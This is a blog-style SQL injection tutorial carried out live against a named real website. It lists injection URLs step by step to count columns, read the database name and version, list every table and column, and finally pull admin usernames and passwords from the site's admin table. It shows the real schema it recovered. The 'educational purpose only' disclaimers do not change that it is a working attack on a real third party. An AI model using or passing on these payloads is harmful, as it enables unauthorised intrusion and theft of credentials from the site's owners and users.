How to use SQL Injection? Best Online Tutorial for SQL Injection
I receive many emails on how to hack a website using sql injection so, here is the hacking tutorial on it,
[NOTE: This is for educational purpose only.]
This is practical tutorial...! as long as this .pk site is up !
So lets start.. Hers is the website on which this live testing was done: http://www.depo.org.pk
Try to Find variables passing to inner script...
http://www.depo.org.pk/index.php?a=newsdetail&id=1
Where &id= is variable passing values to sql
Check whether it is vulnerable or Not... Put ' in place of 1 as shown below
depo.org.pk/index.php?a=newsdetail&id='
If it shows error ! Then we can apply sqli on this URL. Now we need to determine numbers of columns in current table.
Increase numbers un-till u get rid of 'The used SELECT statements have a different number of columns
+1
+1,2
+1,2,3
+1,2.3,4
+1,2,3,4,5
+1,2,3,4,5,6
+1,2,3,4,5,6,7
+1,2,3,4,5,6,7,8... ! Order to find columns... !
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3,4
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3,4,5
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3,4,5,6
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3,4,5,6,7
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3,4,5,6,7,8
here we get no error.
Here, we used SQL Functions directly from browser.
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,database(),version(),4,5,6,7,8
database:- depo
version:- 5.0.45-log
------------------------------------------------
Several useful functions (http://dev.mysql.com/doc/refman/5.0/en/functions.html)
user()
database()
version()
current_user()
load_file()
hex()
unhex()
char()
concat()
group_concat()
------------------------------------------------
Now, we need to know structure of victim's mysql database
NOTE: SQL stores each column and table information in another table called as 'information_schema'
Attach SQL Query '+from+information_schema.tables+where+table_schem a=database()' @ the ending of column numbers !
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3,4,5,6,7,8+from+information_schema.tables
+where+table_
schema=database()
Now, we want to fatch table structure of database named as 'depo' !
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,group_concat(table_name),3,4,5,6,7,8+from
+information_schema.tables+where+table_schema=database()
Table names
admin,feedback,ideas,inquiry,members_detail_page,
members_detail_page_pictures,news,newsletter,
org_prod_categories,organizations,orginquiry,pages,
product_categories,products,products_pictures,profile
Now, its turn of column !
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,group_concat(column_name),3,4,5,6,7,8
+from+information_schema.columns+where+table_schema=database()
Column names
id,login,password,id,name,
company,email,country,learnsite,
visits,content,graphics,loading,organization,
comments,date,id,fname,lname,nic,occupation,
designation,organization,address,
country,city,state,zip,phone,fax,email,website,
date,id,country,agency,telephone,fax,email,website,
demand,company,address,date,id,heading_one,
text_one,heading_two
Its time to fetch Id and password from Table Admin !
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,group_concat%28login,0x3a,password%29,3,4,5,6,7,8
+from+admin
FOR EDUCATIONAL PURPOSES ONLY.
########################################################
-------------------------------------------------------------------------------------------
..................................................................................................................
0 comments:
Post a Comment